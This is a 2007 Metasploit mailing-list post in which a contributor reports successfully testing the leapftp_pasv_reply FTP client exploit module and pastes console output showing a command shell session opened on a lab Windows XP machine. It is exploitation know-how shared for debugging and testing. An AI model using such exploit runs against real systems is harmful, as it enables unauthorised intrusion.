Metasploit mailing list archives
Bug in exploit/windows/ftp/leapftp_pasv_reply
From: patrick at aushack.com (Patrick Webster)
Date: Sat, 22 Sep 2007 13:03:52 +1000
Hi Sairam, I have tested your Korean version (says Chinese (PRC)). It worked fine for me... though I did use a reverse shell. msf exploit(leapftp_pasv_reply) > rexploit [*] Stopping existing job... [*] Server stopped. [*] Started bind handler [*] Server started. [*] Exploit running as background job. msf exploit(leapftp_pasv_reply) > [*] Started bind handler [*] Command shell session 2 opened (192.168.195.1:1471 -> 192.168.195.132:4444) msf exploit(leapftp_pasv_reply) > sessions -l -v Active sessions =============== Id Description Tunnel Via -- ----------- ------ --- 2 Command shell 192.168.195.1:1471 -> 192.168.195.132:4444 windows/ftp/leapftp_pasv_reply msf exploit(leapftp_pasv_reply) > sessions -i 2 [*] Starting interaction with 2... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Inetpub\ftproot\winxp>whoami whoami 'whoami' is not recognized as an internal or external command, operable program or batch file. C:\Inetpub\ftproot\winxp>exit exit [*] Command shell session 2 closed. -Patrick -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070922/70e1dcca/attachment.htm>
Current thread:
- Bug in exploit/windows/ftp/leapftp_pasv_reply M.P.Sairam (Sep 21)
- Message not available
- Bug in exploit/windows/ftp/leapftp_pasv_reply M.P.Sairam (Sep 21)
- Bug in exploit/windows/ftp/leapftp_pasv_reply Patrick Webster (Sep 21)
- Bug in exploit/windows/ftp/leapftp_pasv_reply Patrick Webster (Sep 21)
- Bug in exploit/windows/ftp/leapftp_pasv_reply M.P.Sairam (Sep 23)
- Bug in exploit/windows/ftp/leapftp_pasv_reply M.P.Sairam (Sep 21)
- Message not available